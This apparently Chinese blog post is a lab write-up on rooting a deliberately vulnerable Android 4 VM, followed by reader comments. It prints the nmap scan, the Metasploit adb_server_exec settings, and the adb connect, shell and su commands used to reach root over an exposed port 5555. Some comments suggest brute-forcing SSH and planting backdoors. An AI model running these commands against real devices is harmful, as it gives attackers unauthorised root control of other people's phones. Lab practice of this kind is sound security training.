Android4漏洞环境简单靶场WriteUp

枫少@KillBoy
枫少@KillBoy
管理员
219
文章
0
粉丝
渗透测试8410,4631字数 326阅读1分5秒阅读模式
AI智能摘要
你是否好奇如何在15分钟内攻破一个看似安全的Android系统?当大多数人还在为移动端安全测试头疼时,这个靶场实验却用四个简单步骤揭示了惊人漏洞:从网络扫描到利用ADB调试端口,最终直接获取root权限。本文将完整重现黑客如何通过5555端口长驱直入,让你掌握移动渗透测试的核心技法,揭开Android系统深藏不露的安全隐患。
— AI 生成的文章内容摘要

今天给大家分享一个简单的Android漏洞环境测试靶场。

按照惯例,思路应该是:

1.扫描IP、端口;
2.攻击
3.获取shell
4.找flag

首先,我们扫描一波找到它的IP,这时候用netdiscover,很简单,怎么用看上一篇文章

Kail Linux中ARP侦查工具Netdiscover使用详细解说

Android4漏洞环境简单靶场WriteUp-图片1

然后我们断定192.168.0.49应该是Android虚拟机的ip

在nmap一波,

nmap -p 1-65535 -A 192.168.0.49

Android4漏洞环境简单靶场WriteUp-图片2

我们看到他开通5555/8080/22000

22000是ssh

那我们看看8080,如图,发现并没有什么卵用。

Android4漏洞环境简单靶场WriteUp-图片3

 

这时候,我们要考虑,搞一波5555端口。随之google一下。发现真的可以好好利用一下。

Android4漏洞环境简单靶场WriteUp-图片4

在Android系统中,TCP的5555旨在允许通过Android调试桥(ADB)管理设备,这是一种Android SDK功能,允许开发人员轻松地与设备通信并在其上运行命令或完全控制它们。

kali下开启msfconsole,对adb模块测试一番

Android4漏洞环境简单靶场WriteUp-图片5

use exploit/android/adb/adb_server_exec  
show options  
#看下如何配置
set rhosts 192.168.0.49  
#设置靶机地址
set lhost 192.168.0.167  
#设置本机地址
run

 

已经成功了,这时候我们需要下载adb链接工具

apt-get install adb
adb connect 192.168.0.49:5555
adb shell

成功了链接后,尝试了一下,发现可以su到root下,一顿乱翻。

在root下,目录/data/root目录下发现了flag

Android4漏洞环境简单靶场WriteUp-图片6

 
枫少@KillBoy
  • adb渗透
  • Android
  • Android渗透
  • Android漏洞环境
  • flag
  • it2021
  • it2021.com
  • kali
  • nmap
  • shell
评论  84  访客  84
    • 鬼灯青荧
      鬼灯青荧 0

      这靶机也太松了,5555直接暴露?🤔

      • 雾灵幽影
        雾灵幽影 1

        su都能进root,安卓模拟器这么随便的?

        • 俏皮妞
          俏皮妞 0

          adb调试模式不关,真实环境早被爆了

          • 断墙哨兵
            断墙哨兵 0

            flag藏data目录算啥,能不能难一点

              • 寂静夜风
                寂静夜风 1

                @ 断墙哨兵 M1芯片跑Android模拟器确实容易抽风,建议用Intel模式试试

                • 电饭煲赛车手
                  电饭煲赛车手 0

                  @ 断墙哨兵 data目录都快成flag养老区了,能不能换个新花样

                • 红烧肉太香
                  红烧肉太香 0

                  之前搞过类似,翻了一堆目录才找到

                    • 非对称梦
                      非对称梦 0

                      @ 红烧肉太香 我去,我之前搭环境也遇到5555连不上,结果防火墙没关

                    • 橡皮擦魔术师
                      橡皮擦魔术师 0

                      kali用得挺溜啊,msf那块讲得清楚

                        • 小狗布丁球
                          小狗布丁球 0

                          @ 橡皮擦魔术师 msf那个模块现在还维护吗?怕不是老版本漏洞

                        • 旅行的背包
                          旅行的背包 0

                          22000是ssh端口,但为啥不去碰它?

                          • 云脑管理员
                            云脑管理员 0

                            netdiscover扫IP那段图真眼熟,老工具了

                              • 呆萌的熊猫
                                呆萌的熊猫 0

                                @ 云脑管理员 这不就是当年我踩的坑嘛,netdiscover扫完还得配合arp-scan补漏

                                • 深渊潜行
                                  深渊潜行 1

                                  @ 云脑管理员 那个netdiscover界面一看就是老渗透人的青春

                                • 跑步达人
                                  跑步达人 0

                                  这个配置在M1上能跑吗?想试试

                                    • 断空之灵
                                      断空之灵 1

                                      @ 跑步达人 M1芯片上应该问题不大,不过可能得走虚拟机兼容模式

                                      • Twilightmurmur
                                        Twilightmurmur 0

                                        @ 跑步达人 M1跑kali虚拟机卡成狗,根本没法试

                                        • 蟠桃仙子
                                          蟠桃仙子 1

                                          @ 跑步达人 m1跑adb确实卡,我试过用虚拟机桥接网络勉强能连上

                                        • 光年
                                          光年 0

                                          flag找到了然后呢?后续还有别的玩法没?

                                            • 荒原狼
                                              荒原狼 0

                                              @ 光年 flag找到了然后升级权限搞持久化啊,难道不兴提权留后门?

                                            • 深思熟虑
                                              深思熟虑 0

                                              翻了半天结果su直接进,这模拟器也太给面子了

                                              • Wispchant
                                                Wispchant 0

                                                netdiscover这界面太经典了,看到就想起来以前熬夜打靶的日子

                                                • 西瓜籽
                                                  西瓜籽 0

                                                  data目录藏flag?我上次在sdcard里找了三小时😭

                                                  • 碧空孤雁
                                                    碧空孤雁 0

                                                    5555开着就像把家门钥匙挂外头,真机谁敢这么搞

                                                      • 带电的棉花糖幽灵
                                                        带电的棉花糖幽灵 1

                                                        @ 碧空孤雁 5555开着确实离谱,但靶场不这样咱们还打个啥

                                                      • 孤独信号
                                                        孤独信号 0

                                                        22000没利用上有点可惜,说不定能横向移动呢

                                                        • 青峰
                                                          青峰 0

                                                          adb shell一连就root,这权限也太豪横了吧

                                                            • 朱厌啸
                                                              朱厌啸 0

                                                              @ 青峰 豪横到离谱,root权限说拿就拿

                                                            • 神经猫
                                                              神经猫 0

                                                              感觉这靶场是给新手练手的,老鸟估计十分钟刷完走人

                                                              • 菜市场哲学
                                                                菜市场哲学 0

                                                                flag到手反而懵了,总感觉还有隐藏关卡没触发

                                                                • 刀马旦
                                                                  刀马旦 1

                                                                  安卓调试桥真是一把双刃剑,方便和风险全在这一端口

                                                                  • Shadowmuse
                                                                    Shadowmuse 0

                                                                    netdiscover这工具用得是真顺手,扫一下立马出结果

                                                                    • 无人知晓
                                                                      无人知晓 0

                                                                      adb直接getshell太爽了,我都忘了现在安卓还能这么玩

                                                                        • 远方的牧歌
                                                                          远方的牧歌 1

                                                                          @ 无人知晓 没想到这么快就能上root,真是意外惊喜

                                                                        • 咕咚水桶
                                                                          咕咚水桶 0

                                                                          root权限说给就给,这模拟器怕不是专门放水的吧

                                                                            • 调皮小茄子
                                                                              调皮小茄子 0

                                                                              @ 咕咚水桶 看到su直接回车进root我人都傻了😂

                                                                            • 封印先知
                                                                              封印先知 0

                                                                              flag藏data目录太常规了,能不能整点花活儿

                                                                              • Soliloquydream
                                                                                Soliloquydream 0

                                                                                之前试过类似环境,折腾半天发现漏了个端口,气死

                                                                                • 高傲孔雀
                                                                                  高傲孔雀 0

                                                                                  22000ssh没利用起来确实可惜,还以为能搞跳板呢

                                                                                  • 寂灭咏叹
                                                                                    寂灭咏叹 0

                                                                                    看到su直接进我都惊了,现在的靶机都这么友好?

                                                                                    • 画皮女妖
                                                                                      画皮女妖 0

                                                                                      5555端口直接敞开,真的太随意了

                                                                                      • 话痨的鹦鹉
                                                                                        话痨的鹦鹉 1

                                                                                        我刚看到这篇,感觉像在玩儿儿童乐园

                                                                                          • 甜梦熊
                                                                                            甜梦熊 0

                                                                                            @ 话痨的鹦鹉 童心未泯的感觉,还挺有意思的

                                                                                          • 铁马金戈
                                                                                            铁马金戈 0

                                                                                            这个adb的版本要怎么配合kali的?

                                                                                            • 零界频率
                                                                                              零界频率 0

                                                                                              之前也折腾过adb,弄了半天才连上

                                                                                              • Sleeptide
                                                                                                Sleeptide 0

                                                                                                flag直接藏data,稳得一批

                                                                                                • 散步时光机
                                                                                                  散步时光机 0

                                                                                                  其实nmap加上‑sV还能看到服务细节,省得再跑一次扫描

                                                                                                    • 甜筒小羊
                                                                                                      甜筒小羊 0

                                                                                                      @ 散步时光机 加了-sV确实省事,我上次漏扫后悔死了

                                                                                                    • 夜之囚
                                                                                                      夜之囚 0

                                                                                                      那如果把5555改成别的端口,还能这么直接root吗

                                                                                                      • 幽梦夜行
                                                                                                        幽梦夜行 1

                                                                                                        我觉得把ssh端口留着不动手实在浪费资源,应该先尝试横向移动再说

                                                                                                        • CyberWraith
                                                                                                          CyberWraith 0

                                                                                                          adb shell直接root,爽!

                                                                                                          • 遗忘的维度
                                                                                                            遗忘的维度 0

                                                                                                            看完这篇,我直接笑出声 😂

                                                                                                            • 志异录
                                                                                                              志异录 0

                                                                                                              adb直接连上就root,这靶机是来送温暖的吧

                                                                                                                • Duskshroud
                                                                                                                  Duskshroud 0

                                                                                                                  @ 志异录 这靶机怕不是专门给新人发福利的

                                                                                                                • 周末漫游者
                                                                                                                  周末漫游者 1

                                                                                                                  flag藏/data/root?真实环境早被删干净了

                                                                                                                  • 猫女赛琳娜
                                                                                                                    猫女赛琳娜 1

                                                                                                                    这靶场设置得,新手村友好度拉满了

                                                                                                                    • 妖灵使
                                                                                                                      妖灵使 1

                                                                                                                      之前搭过类似环境,adb没开调试模式折腾半天

                                                                                                                        • 黄道吉日
                                                                                                                          黄道吉日 1

                                                                                                                          @ 妖灵使 调试没开真的浪费时间,下次记得先打开

                                                                                                                        • Miragewhisper
                                                                                                                          Miragewhisper 0

                                                                                                                          5555端口裸奔,现实中早被挖矿木马占了

                                                                                                                          • 果酱小软糖
                                                                                                                            果酱小软糖 0

                                                                                                                            那如果关了adb调试还能这么轻松进吗?

                                                                                                                            • 话痨の防护罩
                                                                                                                              话痨の防护罩 0

                                                                                                                              netdiscover扫出来一堆VMware,确定没扫错网段?

                                                                                                                                • 霓虹代码
                                                                                                                                  霓虹代码 1

                                                                                                                                  @ 话痨の防护罩 netdiscover扫的是局域网,一堆VMware正常得很,你怕是没用过虚拟机嵌套

                                                                                                                                • 铜锤铁马
                                                                                                                                  铜锤铁马 0

                                                                                                                                  ssh留着不用,纯属浪费,至少试试弱口令啊

                                                                                                                                  • 孤城暮雪
                                                                                                                                    孤城暮雪 0

                                                                                                                                    netdiscover扫完直接上nmap -sV不更顺?

                                                                                                                                    • 旧日旋律
                                                                                                                                      旧日旋律 0

                                                                                                                                      5555开着等于欢迎入侵,真机谁敢这么玩

                                                                                                                                      • 旧日风韵
                                                                                                                                        旧日风韵 1

                                                                                                                                        flag藏data也太明显了,能不能藏system里

                                                                                                                                        • 山川旅人
                                                                                                                                          山川旅人 0

                                                                                                                                          m1跑adb有点卡,有人试过docker方案吗

                                                                                                                                          • 鬼影迷踪
                                                                                                                                            鬼影迷踪 0

                                                                                                                                            翻目录三小时结果su一下进去了气死

                                                                                                                                            • 草药贾
                                                                                                                                              草药贾 0

                                                                                                                                              看到connect 192.168.0.49那刻我就笑出声hhh

                                                                                                                                              • 冷笑话终结者
                                                                                                                                                冷笑话终结者 1

                                                                                                                                                ssh端口晾那儿不用,真的浪费机会啊

                                                                                                                                                • 巧蚁搬家
                                                                                                                                                  巧蚁搬家 0

                                                                                                                                                  这靶机也太给面子了吧,su一下就进root,真实环境做梦去吧

                                                                                                                                                  • 肆意妄为
                                                                                                                                                    肆意妄为 0

                                                                                                                                                    5555开着不关,等于大门敞开请人进来,这设定也太松了

                                                                                                                                                    • 星宇旅者
                                                                                                                                                      星宇旅者 1

                                                                                                                                                      adb连上直接root,这权限给得太爽了吧,我都以为自己手抖打错IP了

                                                                                                                                                      • 石斛
                                                                                                                                                        石斛 0

                                                                                                                                                        翻了半小时目录结果flag就搁root底下,感觉像被安排得明明白白

                                                                                                                                                        • 占星学者
                                                                                                                                                          占星学者 0

                                                                                                                                                          22000端口ssh晾着不用,至少爆破一下试试弱口令也好啊

                                                                                                                                                          • 小糖果兔
                                                                                                                                                            小糖果兔 0

                                                                                                                                                            之前搭环境adb调试没开,折腾半天才发现要手动启动服务

                                                                                                                                                            • 强壮的犀牛
                                                                                                                                                              强壮的犀牛 1

                                                                                                                                                              nmap扫完就知道8080没用,还硬看?不如直接上adb试试

                                                                                                                                                              • Whisperglow
                                                                                                                                                                Whisperglow 0

                                                                                                                                                                netdiscover这工具我用了一次就爱上了,扫IP又快又准

                                                                                                                                                                • 星海无垠
                                                                                                                                                                  星海无垠 1

                                                                                                                                                                  关了adb调试当然不能这么进,不然厂商天天被渗透?

                                                                                                                                                                  • 奶糖小梦
                                                                                                                                                                    奶糖小梦 1

                                                                                                                                                                    看到su直接进我都愣了,这模拟器是怕我们挫败感太强特意放水?

                                                                                                                                                                    • 外滩风云
                                                                                                                                                                      外滩风云 1

                                                                                                                                                                      adb连上就能root也太草率了,真实设备哪敢这么玩

                                                                                                                                                                        • 樱雨纷飞
                                                                                                                                                                          樱雨纷飞 1

                                                                                                                                                                          @ 外滩风云 哈哈,靶场嘛,图个方便

                                                                                                                                                                        • 摸鱼小女王
                                                                                                                                                                          摸鱼小女王 1

                                                                                                                                                                          flag藏data太常规了,搞得我差点以为自己在写CTF模板

                                                                                                                                                                          • 玉面郎君
                                                                                                                                                                            玉面郎君 0

                                                                                                                                                                            m1跑kali本来就吃力,adb再一开风扇狂转,体验感拉满

                                                                                                                                                                          匿名

                                                                                                                                                                          发表评论

                                                                                                                                                                          匿名网友

                                                                                                                                                                          拖动滑块以完成验证